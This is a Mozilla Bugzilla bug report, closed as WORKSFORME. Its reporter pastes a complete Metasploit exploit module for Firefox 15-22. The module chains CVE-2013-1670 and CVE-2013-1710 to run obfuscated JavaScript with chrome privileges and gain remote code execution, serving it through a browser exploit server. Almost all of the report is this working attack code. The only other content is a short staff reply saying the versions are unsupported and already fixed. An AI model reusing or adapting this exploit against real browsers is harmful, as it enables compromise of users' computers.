1055189 - Firefox toString console.time Privileged Javascript Injection

Status: RESOLVED WORKSFORME

(Firefox :: Untriaged, defect)

Description

[Mijanur Rahman Rayhan]

User Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0 (Beta/Release)
Build ID: 20140716183446

Steps to reproduce:

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex/exploitation/jsobfu'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::BrowserAutopwn
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
 
  autopwn_info({
    :ua_name    => HttpClients::FF,
    :ua_minver  => "15.0",
    :ua_maxver  => "22.0",
    :javascript => true,
    :rank       => ExcellentRanking
  })
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Firefox toString console.time Privileged Javascript Injection',
      'Description'    => %q{
        This exploit gains remote code execution on Firefox 15-22 by abusing two separate
        Javascript-related vulnerabilities to ultimately inject malicious Javascript code
        into a context running with chrome:// privileges.
      },
      'License' => MSF_LICENSE,
      'Author'  => [
        'moz_bug_r_a4', # discovered CVE-2013-1710
        'Cody Crews',   # discovered CVE-2013-1670
        'joev' # metasploit module
      ],
      'DisclosureDate' => "May 14 2013",
      'References' => [
        ['CVE', '2013-1670'], # privileged access for content-level constructor
        ['CVE', '2013-1710']  # further chrome injection
      ],
      'Targets' => [
        [
          'Universal (Javascript XPCOM Shell)', {
            'Platform' => 'firefox',
            'Arch' => ARCH_FIREFOX
          }
        ],
        [
          'Native Payload', {
            'Platform' => %w{ java linux osx solaris win },
            'Arch'     => ARCH_ALL
          }
        ]
      ],
      'DefaultTarget' => 0,
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::FF,
        :ua_ver  => lambda { |ver| ver.to_i.between?(15, 22) }
      }
    ))
 
    register_options([
      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
    ], self.class)
  end
 
  def on_request_exploit(cli, request, target_info)
    send_response_html(cli, generate_html(target_info))
  end
 
  def generate_html(target_info)
    key = Rex::Text.rand_text_alpha(5 + rand(12))
    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
 
    js = Rex::Exploitation::JSObfu.new(%Q|
      var opts = #{JSON.unparse(opts)};
      var key = opts['#{key}'];
      var y = {}, q = false;
      y.constructor.prototype.toString=function() {
        if (q) return;
        q = true;
        crypto.generateCRMFRequest("CN=Me", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", null, key, 1024, null, "rsa-ex");
        return 5;
      };
      console.time(y);
    |)
 
    js.obfuscate
 
    %Q|
      <!doctype html>
      <html>
        <body>
          <script>
            #{js}
          </script>
          #{datastore['CONTENT']}
        </body>
      </html>
    |
  end
end


Actual results:

This Metasploit module gains remote code execution on Firefox 15-22 by abusing two separate Javascript-related vulnerabilities to ultimately inject malicious Javascript code into a context running with chrome:// privileges

Comment 1

[Curtis Koenig [:curtisk-use curtis.koenig+bzATgmail.com]]]

this only works on version 15-22, which are unsupported versions as the relevant fixes have been shipped
CVE-2013-1710 fixed by bug 871368
CVE-2013-1670 fixed by bug 853709